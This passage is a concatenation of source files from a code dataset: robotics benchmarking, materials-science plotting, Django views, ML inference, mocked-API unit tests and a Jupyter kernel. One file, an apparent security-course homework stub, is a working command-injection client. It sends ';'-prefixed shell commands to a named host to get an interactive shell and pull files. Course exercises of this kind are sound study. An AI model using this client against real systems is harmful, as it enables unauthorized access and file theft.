pathValidityDF[\n        benchParams].apply(lambda x: ', '.join(x.astype(str)), axis=1)\n\n    # Usual boxplot for each variable that was benchmarked\n    for plotVar in boxPlotsToMake:\n\n        # make it wider for the insane length of xticklabels\n        fig = plt.figure(figsize=(20, 10))\n\n        plt.style.use(\"seaborn-darkgrid\")\n        bp = sns.boxplot(data=benchMarkingDF,\n                         x=mergedParamsName, y=plotVar)\n        sns.swarmplot(x=mergedParamsName, y=plotVar, data=benchMarkingDF,\n                      color=\"grey\")\n\n        # for readability of axis labels\n        bp.set_xticklabels(bp.get_xticklabels(), rotation=45, ha='right')\n\n        newPlotTitle = plotVar + '-' + plotTitle\n        plt.title('Benchmarking of Sampled Planner ' + plotVar)\n        savePlot(fig=fig, shouldSavePlots=True,\n                 baseSaveFName=baseSaveFName, plotTitle=newPlotTitle)\n\n    # number of times a valid path was found\n    fig = plt.figure()\n\n    plt.style.use('seaborn-darkgrid')\n    bp = sns.barplot(x=mergedParamsName, y='numValidPaths',\n                     data=pathValidityDF)\n    plt.title('Number of Valid Paths Found for Each Parameter Combination')\n\n    # for readability of axis labels\n    bp.set_xticklabels(bp.get_xticklabels(), rotation=45, ha='right')\n\n    newPlotTitle = 'numPaths' + '-' + plotTitle\n    savePlot(fig=fig, shouldSavePlots=True,\n             baseSaveFName=baseSaveFName, plotTitle=newPlotTitle)\n\ndef main():\n    print(\" Config Files need to be updated for different results \")\n    val = input(\" Enter 0 for Default Single setup or 1 for Benchmarking: \")\n    val = int(val)\n\n    if val == 0:\n        name = 'prm_w02_backup.yaml'\n        with open('prm_w02_backup.yaml', 'r') as stream:\n            configData = yaml.load(stream, Loader=yaml.Loader)\n        \n        # prm = PRM()\n        \n        numRunsOfPlannerPerSetting = configData['numRunsOfPlannerPerSetting']\n        parametersToVary = configData['paramterNamesToVary']\n        allParams = dict((var, configData[var]) for var in parametersToVary)\n        print(allParams)\n\n        keys, values = zip(*allParams.items())\n        experiments = [dict(zip(keys, v)) for v in itertools.product(*values)]\n        print(experiments)\n        data = []\n        pathValidityData = []\n\n        print(\"Running Experiments\")\n        print(experiments)\n\n        for experiment in experiments:\n            print(\"Currently Running Experiment\")\n            print(experiment)\n            prm = None\n            prm = PRM(name=name, n=experiment['n'], r=experiment['r'], smoothing=experiment['smoothing'])\n            plotConfigData = {'shouldPlot': True,\n                              'plotTitle': '',\n                              'xlabel': 'x',\n                              'ylabel': 
'y',\n                              'plotObstacles': True,\n                              'plotGrid': False}\n            print(experiment)\n            numValidPaths = 0  # count only runs that actually found a path\n            runInfo = {}\n\n            for idx, i in enumerate(range(0, numRunsOfPlannerPerSetting)):\n                print(idx)\n                (computationTime,\n                 pathLength,\n                 fp) = prm.findPathToGoal(startState=configData['startState'],\n                                          goalState=configData['goalState'],\n                                          plotConfigData=plotConfigData,\n                                          plannerConfigData=experiment,\n                                          shouldBenchmark=True)\n\n        plt.show()\n\n    elif val == 1:\n        name = 'prm_w02.yaml'\n        with open('prm_w02.yaml', 'r') as stream:\n            configData = yaml.load(stream, Loader=yaml.Loader)\n        \n        # prm = PRM()\n        \n        numRunsOfPlannerPerSetting = configData['numRunsOfPlannerPerSetting']\n        parametersToVary = configData['paramterNamesToVary']\n        allParams = dict((var, configData[var]) for var in parametersToVary)\n        print(allParams)\n\n        keys, values = zip(*allParams.items())\n        experiments = [dict(zip(keys, v)) for v in itertools.product(*values)]\n        print(experiments)\n        data = []\n        pathValidityData = []\n\n        print(\"Running Experiments\")\n        print(experiments)\n\n        for experiment in experiments:\n            print(\"Currently Running Experiment\")\n            print(experiment)\n            prm = None\n            prm = PRM(name=name, n=experiment['n'], r=experiment['r'], smoothing=experiment['smoothing'])\n            plotConfigData = {'shouldPlot': True,\n                              'plotTitle': '',\n                              'xlabel': 'x',\n                              'ylabel': 'y',\n                              'plotObstacles': True,\n                              'plotGrid': False}\n            print(experiment)\n            numValidPaths = 0\n            runInfo = {}\n\n            for idx, i in enumerate(range(0, numRunsOfPlannerPerSetting)):\n                print(idx)\n                (computationTime,\n                 pathLength,\n                 fp) = prm.findPathToGoal(startState=configData['startState'],\n                                          goalState=configData['goalState'],\n                                          plotConfigData=plotConfigData,\n                                          plannerConfigData=experiment,\n                                          shouldBenchmark=True)\n\n                # dat = None\n                dat = {'computationTimeInSeconds': computationTime, 'pathLength': pathLength}\n                # bencmarkingInfo = None \n                # fp = None\n                bencmarkingInfo = {**dat, **experiment}\n                # benchmarkingInfo = None \n                # foundPath = None \n                (benchmarkingInfo, foundPath) = (bencmarkingInfo, fp)\n                print(foundPath)\n                \n                benchmarkingInfo.update(experiment)\n                data.append(benchmarkingInfo)\n\n                # print(foundPath)\n\n                if foundPath:\n                    numValidPaths += 1\n\n\n            \n            runInfo['numValidPaths'] = copy.deepcopy(numValidPaths)\n            runInfo['numTimesRun'] = numRunsOfPlannerPerSetting\n            runInfo.update(copy.deepcopy(experiment))\n            pathValidityData.append(runInfo)\n\n            print(runInfo)\n\n\n        benchMarkingDF = pd.DataFrame(data)\n        pathValidityDF = pd.DataFrame(pathValidityData)\n\n        benchMarkingDF.to_csv('/home/arpit/studies/motion/Assignment4/benchMarkingDF.csv',header=True)\n        pathValidityDF.to_csv('/home/arpit/studies/motion/Assignment4/pathValidityDF.csv',header=True)\n\n        (benchMarkingDF, pathValidityDF, benchParams) = (benchMarkingDF, pathValidityDF, parametersToVary)\n\n        plotTitle = 'PRM' + '_stats'\n\n        # save plots into a 'plots' directory next to this script\n        my_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'plots')\n\n        plotStatistics(benchMarkingDF=benchMarkingDF,\n                       pathValidityDF=pathValidityDF,\n                       benchParams=benchParams,\n                       baseSaveFName=my_path,\n                       plotTitle=plotTitle)\n\n\n\n\nif __name__ == '__main__':\n    main()","sub_path":"RRT_and_PRM/Code/code/prm_WO2.py","file_name":"prm_WO2.py","file_ext":"py","file_size_in_byte":21527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"164743022","text":"# Here, we will analyze the DOS of 14 1 11 for different basis sets\nfrom pathlib import Path\n#relevant classes\nfrom pymatgen.io.lobster import Doscar\nfrom pymatgen.electronic_structure.plotter import DosPlotter\nfrom 
pymatgen.core.composition import Element\n\n# elementwise density of states\n\nfor spin in [\"Spin_2\", \"Spin_mixed\"]:\n    for lobster in [\"lobster_0\", \"lobster_1\"]:\n        directory = (\n            Path(__file__).parent.parent / f\"Results/Yb14MnSb11/mp-568088/{spin}/{lobster}\"\n        )\n        # read in DOSCAR.lobster\n        doscar = Doscar(doscar=directory/\"DOSCAR.lobster.gz\", structure_file=directory/\"POSCAR.gz\")\n        complete_dos = doscar.completedos\n        # get structure object\n        structure = complete_dos.structure\n        Plotter = DosPlotter()\n        el = Element(\"Mn\")\n        Plotter.add_dos_dict(complete_dos.get_element_spd_dos(el=el))\n        Plotter.get_plot().show()\n\n","sub_path":"Analysis_Scripts/analyze_results_14_1_11_DOS_Mn.py","file_name":"analyze_results_14_1_11_DOS_Mn.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"154884556","text":"from django.shortcuts import render, redirect\nfrom .models import Album\nfrom django.contrib import messages\nfrom .forms import AlbumCreateForm\n\n\ndef album(request):\n    albums = Album.objects.all()\n    top_albums = Album.objects.filter(is_top=True)\n    return render(request,\"album/album.html\", { \"albums\":albums, \n                                                \"top_albums\":top_albums })\n    \n    \n# Edit an album\ndef edit_album(request, pk):\n    album = Album.objects.get(id=pk)\n    \n    form = AlbumCreateForm(instance=album)\n    \n    if request.user.is_authenticated():\n        if request.method == \"POST\":\n            form = AlbumCreateForm(request.POST, request.FILES, instance=album)\n            \n            if form.is_valid():\n                form.save()    \n                return redirect('album:album')    \n    else:\n        form = AlbumCreateForm()\n    return render(request, \"album/album_edit.html\", {'form': form, 'album':album})\n    \n    \n# Add an album\ndef add_album(request):    \n    \n    if request.method == \"POST\":\n        form = AlbumCreateForm(request.POST, request.FILES)\n        \n        if form.is_valid():\n            instance = form.save()\n            messages.success(request, \"Saved\")\n            return redirect('album:album')\n        else:\n            messages.error(request, 'No success!')    \n        \n    else:\n        form = AlbumCreateForm()\n    return render(request, \"album/album_add.html\", {'form': form})\t    \n    \t\n    \n# Delete an album\ndef album_delete(request, pk):\n    instance = Album.objects.get(id=pk)\n    if request.method == \"POST\":    \n        instance.delete()\n        messages.success(request, \"DELETED\")\n        return redirect (\"album:album\")\n    return render(request, \"album/album_delete.html\", {'instance':instance})\n    \n# Remove from the top list    \ndef remove_top(request):\n    if request.method==\"POST\":\n        pk = request.POST.get('pk')\n        album = Album.objects.get(pk=pk)\n        album.untop()\n        return redirect (\"album:album\")\n    \n# Add to the top list    \ndef add_to_top(request):\n    if request.method==\"POST\":\n        pk = request.POST.get('pk')\n        album = Album.objects.get(pk=pk)\n        album.addtop()\n        return redirect (\"album:album\")\n    \n# Announce (set the cover)    \ndef add_cover(request):\n    if request.method==\"POST\":\n        pk = request.POST.get('pk')\n        album = Album.objects.get(id=pk)\n        album.anounce()\n        return redirect (\"album:album\")\n\n","sub_path":"album/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"571637855","text":"\"\"\"\nClass to make an inference using the trained model.\n\"\"\"\nfrom sklearn.externals import joblib\nimport sys\nfrom sklearn import preprocessing\nimport numpy as np\n\nclass Inference:\n    def __init__(self):\n        self.regions = [\"US\", \"Latin_America\", \"Europe\", 
\"Asia\", \"South_America\"]\n self.sentiments = [\"happy\", \"sad\", \"neutral\"]\n self.dayTimes = [\"morning\", \"afternoon\", \"night\"]\n self.brands = [\"Fanta\", \"Coke\", \"Coke_Zero\", \"Diet_Coke\", \"Smart_Water\", \"Minute_Made\", \"Sobe\", \"Mineral_Water\",\n \"Sprite\"]\n \n # Instantiate Label Encoders\n self.regions_le = preprocessing.LabelEncoder().fit(self.regions)\n self.sentiments_le = preprocessing.LabelEncoder().fit(self.sentiments)\n self.dayTimes_le = preprocessing.LabelEncoder().fit(self.dayTimes)\n self.brands_le = preprocessing.LabelEncoder().fit(self.brands)\n \n # Load classifier\n self.clf = joblib.load(filename='clf.pkl')\n \n def infer(self, region, brand, text_len, sentiment, has_photo, has_vid, vid_len, dayTime):\n \n print('\\n\\nPredicting performance...')\n region = list(self.regions_le.transform(region))[0]\n brand = list(self.brands_le.transform(brand))[0]\n sentiment = list(self.sentiments_le.transform(sentiment))[0]\n tod = list(self.dayTimes_le.transform(dayTime))[0]\n array = np.array([region, brand, text_len[0], sentiment, has_photo[0], has_vid[0], vid_len[0], tod]).reshape(1, -1)\n pred = self.clf.predict(array)\n print(\"The model predicts {} likes!\".format(pred[0]), '\\n\\n')\n \nif __name__ == '__main__':\n inf = Inference()\n region = np.array([sys.argv[1]])\n brand = np.array([sys.argv[2]])\n text_len = np.array([sys.argv[3]])\n sentiment = np.array([sys.argv[4]])\n has_photo = np.array([sys.argv[5]])\n has_vid = np.array([sys.argv[6]])\n vid_len = np.array([sys.argv[7]])\n tod = np.array([sys.argv[8]])\n inf.infer(region,\n brand, text_len, sentiment, has_photo, has_vid, vid_len, tod)\n \n \n","sub_path":"Inference.py","file_name":"Inference.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"271370441","text":"#!/usr/bin/env python\n# Copyright 2016-2017 IBM Corp. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nUnit tests for _nic module.\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport unittest\nimport requests_mock\n\nfrom zhmcclient import Session, Client, Nic\n\n\nclass NicTests(unittest.TestCase):\n \"\"\"All tests for Nic and NicManager classes.\"\"\"\n\n def setUp(self):\n self.session = Session('test-dpm-host', 'test-user', 'test-id')\n self.client = Client(self.session)\n with requests_mock.mock() as m:\n # Because logon is deferred until needed, we perform it\n # explicitly in order to keep mocking in the actual test simple.\n m.post('/api/sessions', json={'api-session': 'test-session-id'})\n self.session.logon()\n\n self.cpc_mgr = self.client.cpcs\n with requests_mock.mock() as m:\n result = {\n 'cpcs': [\n {\n 'object-uri': '/api/cpcs/fake-cpc-id-1',\n 'name': 'CPC1',\n 'status': '',\n }\n ]\n }\n m.get('/api/cpcs', json=result)\n# self.cpc = self.cpc_mgr.find(name=\"CPC1\", full_properties=False)\n cpcs = self.cpc_mgr.list()\n self.cpc = cpcs[0]\n\n partition_mgr = self.cpc.partitions\n with requests_mock.mock() as m:\n result = {\n 'partitions': [\n {\n 'status': 'active',\n 'object-uri': '/api/partitions/fake-part-id-1',\n 'name': 'PART1'\n },\n {\n 'status': 'stopped',\n 'object-uri': '/api/partitions/fake-part-id-2',\n 'name': 'PART2'\n }\n ]\n }\n\n m.get('/api/cpcs/fake-cpc-id-1/partitions', json=result)\n\n mock_result_part1 = {\n 'status': 'active',\n 'object-uri': '/api/partitions/fake-part-id-1',\n 'name': 'PART1',\n 'description': 'Test Partition',\n 'more_properties': 'bliblablub',\n 'nic-uris': [\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2'\n ]\n }\n m.get('/api/partitions/fake-part-id-1',\n json=mock_result_part1)\n mock_result_part2 = {\n 'status': 'stopped',\n 'object-uri': '/api/partitions/fake-lpar-id-2',\n 'name': 'PART2',\n 'description': 'Test Partition',\n 'more_properties': 'bliblablub',\n 'nic-uris': [\n '/api/partitions/fake-part-id-2/nics/fake-nic-id-4',\n '/api/partitions/fake-part-id-2/nics/fake-nic-id-6'\n ]\n }\n m.get('/api/partitions/fake-part-id-2',\n json=mock_result_part2)\n\n partitions = partition_mgr.list(full_properties=True)\n self.partition = partitions[0]\n\n def tearDown(self):\n with requests_mock.mock() as m:\n m.delete('/api/sessions/this-session', status_code=204)\n self.session.logoff()\n\n def test_init(self):\n \"\"\"Test __init__() on NicManager instance in Partition.\"\"\"\n nic_mgr = self.partition.nics\n self.assertEqual(nic_mgr.partition, self.partition)\n\n def test_list_short_ok(self):\n \"\"\"\n Test successful list() with short set of properties on\n NicManager instance in partition.\n \"\"\"\n nic_mgr = self.partition.nics\n nics = nic_mgr.list(full_properties=False)\n\n self.assertEqual(len(nics), len(self.partition.properties['nic-uris']))\n for idx, nic in enumerate(nics):\n self.assertEqual(\n nic.properties['element-uri'],\n 
self.partition.properties['nic-uris'][idx])\n self.assertEqual(\n nic.uri,\n self.partition.properties['nic-uris'][idx])\n self.assertFalse(nic.full_properties)\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_list_full_ok(self):\n \"\"\"\n Test successful list() with full set of properties on\n NicManager instance in partition.\n \"\"\"\n nic_mgr = self.partition.nics\n\n with requests_mock.mock() as m:\n\n mock_result_nic1 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic1',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-1',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n json=mock_result_nic1)\n mock_result_nic2 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic2',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-2',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n json=mock_result_nic2)\n\n nics = nic_mgr.list(full_properties=True)\n\n self.assertEqual(\n len(nics),\n len(self.partition.properties['nic-uris']))\n for idx, nic in enumerate(nics):\n self.assertEqual(\n nic.properties['element-uri'],\n self.partition.properties['nic-uris'][idx])\n self.assertEqual(\n nic.uri,\n self.partition.properties['nic-uris'][idx])\n self.assertTrue(nic.full_properties)\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_list_filter_name_ok(self):\n \"\"\"\n Test successful list() with filter arguments using the 'name' property\n on a NicManager instance in a partition.\n \"\"\"\n nic_mgr = self.partition.nics\n\n with requests_mock.mock() as m:\n\n mock_result_nic1 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic1',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-1',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n json=mock_result_nic1)\n mock_result_nic2 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic2',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-2',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n json=mock_result_nic2)\n\n filter_args = {'name': 'nic2'}\n nics = nic_mgr.list(filter_args=filter_args)\n\n self.assertEqual(len(nics), 1)\n nic = nics[0]\n self.assertEqual(nic.name, 'nic2')\n self.assertEqual(\n nic.uri,\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2')\n self.assertEqual(nic.properties['name'], 'nic2')\n self.assertEqual(nic.properties['element-id'], 'fake-nic-id-2')\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_list_filter_elementid_ok(self):\n \"\"\"\n Test successful list() with filter arguments using the 'element-id'\n property on a NicManager instance in a partition.\n \"\"\"\n nic_mgr = self.partition.nics\n\n with requests_mock.mock() as m:\n\n mock_result_nic1 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic1',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-1',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n 
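# register the canned GET response for the first NIC before issuing the filtered list call\n            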
m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n json=mock_result_nic1)\n mock_result_nic2 = {\n 'parent': '/api/partitions/fake-part-id-1',\n 'name': 'nic2',\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n 'class': 'nic',\n 'element-id': 'fake-nic-id-2',\n 'type': 'osd',\n 'description': '',\n 'more_properties': 'bliblablub'\n }\n m.get('/api/partitions/fake-part-id-1/nics/fake-nic-id-2',\n json=mock_result_nic2)\n\n filter_args = {'element-id': 'fake-nic-id-2'}\n nics = nic_mgr.list(filter_args=filter_args)\n\n self.assertEqual(len(nics), 1)\n nic = nics[0]\n self.assertEqual(nic.name, 'nic2')\n self.assertEqual(\n nic.uri,\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-2')\n self.assertEqual(nic.properties['name'], 'nic2')\n self.assertEqual(nic.properties['element-id'], 'fake-nic-id-2')\n self.assertEqual(nic.manager, nic_mgr)\n\n def test_create(self):\n \"\"\"\n This tests the 'Create NIC' operation.\n \"\"\"\n nic_mgr = self.partition.nics\n with requests_mock.mock() as m:\n result = {\n 'element-uri':\n '/api/partitions/fake-part-id-1/nics/fake-nic-id-1'\n }\n m.post('/api/partitions/fake-part-id-1/nics', json=result)\n\n nic = nic_mgr.create(properties={})\n\n self.assertTrue(isinstance(nic, Nic))\n self.assertEqual(nic.properties, result)\n self.assertEqual(nic.uri, result['element-uri'])\n\n def test_delete(self):\n \"\"\"\n This tests the 'Delete NIC' operation.\n \"\"\"\n nic_mgr = self.partition.nics\n nics = nic_mgr.list(full_properties=False)\n nic = nics[0]\n with requests_mock.mock() as m:\n m.delete('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n status_code=204)\n nic.delete()\n\n def test_update_properties(self):\n \"\"\"\n This tests the 'Update NIC Properties' operation.\n \"\"\"\n nic_mgr = self.partition.nics\n nics = nic_mgr.list(full_properties=False)\n nic = nics[0]\n with requests_mock.mock() as m:\n m.post('/api/partitions/fake-part-id-1/nics/fake-nic-id-1',\n status_code=204)\n nic.update_properties(properties={})\n\n def test_nic_object(self):\n \"\"\"\n This tests the `nic_object()` method.\n \"\"\"\n nic_mgr = self.partition.nics\n nic_id = 'fake-nic-id0711'\n\n nic = nic_mgr.nic_object(nic_id)\n\n nic_uri = self.partition.uri + \"/nics/\" + nic_id\n\n self.assertTrue(isinstance(nic, Nic))\n self.assertEqual(nic.uri, nic_uri)\n self.assertEqual(nic.properties['element-uri'], nic_uri)\n self.assertEqual(nic.properties['element-id'], nic_id)\n self.assertEqual(nic.properties['class'], 'nic')\n self.assertEqual(nic.properties['parent'], self.partition.uri)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_nic.py","file_name":"test_nic.py","file_ext":"py","file_size_in_byte":12684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"399458822","text":"\"\"\"\n Use the same techniques such as (but not limited to):\n 1) Sockets\n 2) File I/O\n 3) raw_input()\n\n from the OSINT HW to complete this assignment. 
Good luck!\n\"\"\"\n\nimport socket\nimport re\nimport time\n\nhost = \"cornerstoneairlines.co\" # IP address here\nport = 45 # Port here\n\ndef execute_cmd(cmd):\n \"\"\"\n Sockets: https://docs.python.org/2/library/socket.html\n How to use the socket s:\n\n # Establish socket connection\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n\n Reading:\n\n data = s.recv(1024) # Receives 1024 bytes from IP/Port\n print(data) # Prints data\n\n Sending:\n\n s.send(\"something to send\\n\") # Send a newline \\n at the end of your command\n \"\"\"\n regex = re.match('^\\s*(\\w*)\\s*([A-Za-z0-9.\\/\\-\\_]*)\\s*([A-Za-z0-9.\\/\\-\\_]*)\\s*$', cmd)\n val = regex.group(1)\n# print('val: %s' % val)\n if val == 'shell':\n path = '/'\n while True:\n usr_in = raw_input(path + \">\")\n if usr_in == 'exit':\n break\n command = ';' + ' cd ' + path + '; ' + usr_in\n if ('cd' in usr_in):\n# print('here')\n reg = re.match('^\\s*cd\\s*([A-Za-z0-9.\\/\\-\\_]*)\\s*$', usr_in)\n if (reg.group(1) == ''):\n path = '/'\n elif (reg.group(1)[0] == '/'):\n path = reg.group(1)\n else:\n path += reg.group(1)\n if (path[-1] != '/'):\n path += '/'\n# print('command: \"%s\"' % command)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n data = s.recv(1024)\n time.sleep(2)\n# print('%s' % data)\n s.send(command + '\\n')\n time.sleep(2)\n# print('\"%s\" sent' % command)\n data = s.recv(1024)\n print('%s' % data)\n s.close()\n elif val == 'pull':\n command = '; ' + 'cat ' + regex.group(2)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n data = s.recv(1024)\n time.sleep(2)\n s.send(command + '\\n')\n time.sleep(2)\n# print('\"%s\" sent' % command)\n data = s.recv(1024)\n# print('%s' % data)\n s.close()\n f = open(regex.group(3), 'w')\n f.write(data)\n f.close()\n elif val == 'quit':\n return -1\n elif val == 'help':\n print('shell - Drop into an interactive shell - exit with \"exit\"')\n print('pull - download files')\n print('help - show the help menu')\n print('quit - quit this program')\n else:\n print('invalid command')\n\n return 0\n\n\n\n\nif __name__ == '__main__':\n while True:\n cmd = raw_input('>')\n if execute_cmd(cmd) == -1:\n break\n\n\n","sub_path":"week/4/writeup/stub.py","file_name":"stub.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"389005838","text":"# -*- coding: utf-8 -*-\n\"\"\"\nthis script splits the execution into peaces.\n\ninput: (pjt_name)_tc.csv\noutput: process(num).csv\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\n\ndef file_divider(pjt_name, start, end):\n cmd = 'sed -n -e ' + str(start) +',' + str(end) + 'p ' + pjt_name + '_tc.csv'\n result = subprocess.check_output(cmd, shell=True)\n f = open(\"tmp\" + str(end) + \".csv\", \"w\")\n f.write(result)\n f.close()\n cmd = 'mkdir process' + str(end)\n os.system(cmd)\n cmd = 'cp *.py process' + str(end)\n os.system(cmd)\n cmd = 'cp *.txt process' + str(end)\n os.system(cmd)\n cmd = 'cp *.csv process' + str(end)\n os.system(cmd)\n os.chdir('./process' + str(end))\n cmd = 'rm ' + pjt_name + '_tc.csv'\n os.system(cmd)\n cmd = 'mv tmp' + str(end) + '.csv ' + pjt_name + '_tc.csv'\n os.system(cmd)\n os.chdir('..')\n os.system(\"rm tmp*.csv\")\n return\n\nargvs = sys.argv\npjt_name = argvs[1]\ncmd = 'cat ' + pjt_name + '_tc.csv | wc -l'\nnum = subprocess.check_output(cmd, shell=True)\nnum = num.replace(\" \", \"\")\nnum = num.replace(\"\\n\", \"\")\nfor 
x in range(int(num) + 1):\n    if x % 1000 == 0:\n        if x == 0:\n            start = x + 1\n        else:\n            end = x\n            file_divider(pjt_name, start, end)\n            start = end + 1\nif start < int(num):\n    end = int(num)\n    file_divider(pjt_name, start, end)\n","sub_path":"change_history_view/change_history_view_import/file_divider.py","file_name":"file_divider.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"200784589","text":"from rest_framework import serializers\nfrom editor.models import Article, ArticleSet, Assignment\nfrom user_profile.models import Section, User\nfrom django.contrib.auth import get_user_model\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass ArticleSetSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ArticleSet\n        fields = '__all__'\n\n\nclass AssignmentSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Assignment\n        fields = ('assigned_to',)\n\n\nclass ArticleSerializer(serializers.ModelSerializer):\n    parent = ArticleSetSerializer(many=False)\n    slug = serializers.StringRelatedField(\n        many=False,\n        read_only=True,\n        source='parent'\n    )\n    assignments = AssignmentSerializer(many=True)\n    # section = serializers.PrimaryKeyRelatedField(\n    #     many=False, read_only=True, source='parent.section')\n\n    class Meta:\n        model = Article\n        fields = '__all__'\n\n    def update(self, instance, validated_data):\n        print(\"INSIDE UPDATE\")\n        print(instance)\n        print(validated_data)\n        parent_data = validated_data.pop('parent')\n        try:\n            parent = instance.parent\n        except ObjectDoesNotExist:\n            return None\n\n        # Simple fields\n        instance.is_locked = validated_data.get(\n            'is_locked', instance.is_locked)\n        instance.is_in_copy = validated_data.get(\n            'is_in_copy', instance.is_in_copy)\n        instance.is_copy_edited = validated_data.get(\n            'is_copy_edited', instance.is_copy_edited)\n        instance.is_breaking = validated_data.get(\n            'is_breaking', instance.is_breaking)\n        instance.published = validated_data.get(\n            'published', instance.published)\n        instance.go_live_at = validated_data.get(\n            'go_live_at', instance.go_live_at)\n        instance.publish_attempts = validated_data.get(\n            'publish_attempts', instance.publish_attempts)\n        \n        # Foreign key fields\n        locked_by = validated_data.get('locked_by', None)\n        if locked_by is not None:\n            locked_by_obj = User.objects.get(pk=locked_by)\n            instance.locked_by = locked_by_obj\n        \n        # Many to many fields (note: on Django >= 2 this direct assignment needs .set())\n        authors = validated_data.get('authors', None)\n        if authors is not None:\n            author_objs = User.objects.filter(pk__in=authors)\n            instance.authors = author_objs\n        \n        # Save\n        instance.save()\n\n        section = parent_data.get('section', None)\n        if section is not None:\n            section_obj = Section.objects.get(pk=section)\n            parent.section = section_obj\n        \n        parent.save()\n\n        return instance\n","sub_path":"server/editor/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"357253269","text":"# Copyright (c) 2015 aggftw@gmail.com\n# Distributed under the terms of the Modified BSD License.\nimport requests\nfrom ipykernel.ipkernel import IPythonKernel\nfrom remotespark.utils.ipythondisplay import IpythonDisplay\n\nimport remotespark.utils.configuration as conf\nfrom remotespark.utils.log import Log\nfrom remotespark.utils.utils import get_connection_string\nfrom .usercommandparser import UserCommandParser\nfrom .codetransformers import *\n\n\nclass SparkKernelBase(IPythonKernel):\n    def __init__(self, 
implementation, implementation_version, language, language_version, language_info,\n kernel_conf_name, session_language, client_name, **kwargs):\n # Required by Jupyter - Override\n self.implementation = implementation\n self.implementation_version = implementation_version\n self.language = language\n self.language_version = language_version\n self.language_info = language_info\n\n # Override\n self.kernel_conf_name = kernel_conf_name\n self.session_language = session_language\n self.client_name = client_name\n\n super(SparkKernelBase, self).__init__(**kwargs)\n\n self._logger = Log(self.client_name)\n self._session_started = False\n self._fatal_error = None\n self._ipython_display = IpythonDisplay()\n\n self.user_command_parser = UserCommandParser()\n\n # Disable warnings for test env in HDI\n requests.packages.urllib3.disable_warnings()\n\n if not kwargs.get(\"testing\", False):\n configuration = self._get_configuration()\n if not configuration:\n # _get_configuration() sets the error for us so we can just return now.\n # The kernel is not in a good state and all do_execute calls will\n # fail with the fatal error.\n return\n (username, password, url) = configuration\n self.connection_string = get_connection_string(url, username, password)\n self._load_magics_extension()\n if conf.use_auto_viz():\n self._register_auto_viz()\n\n def 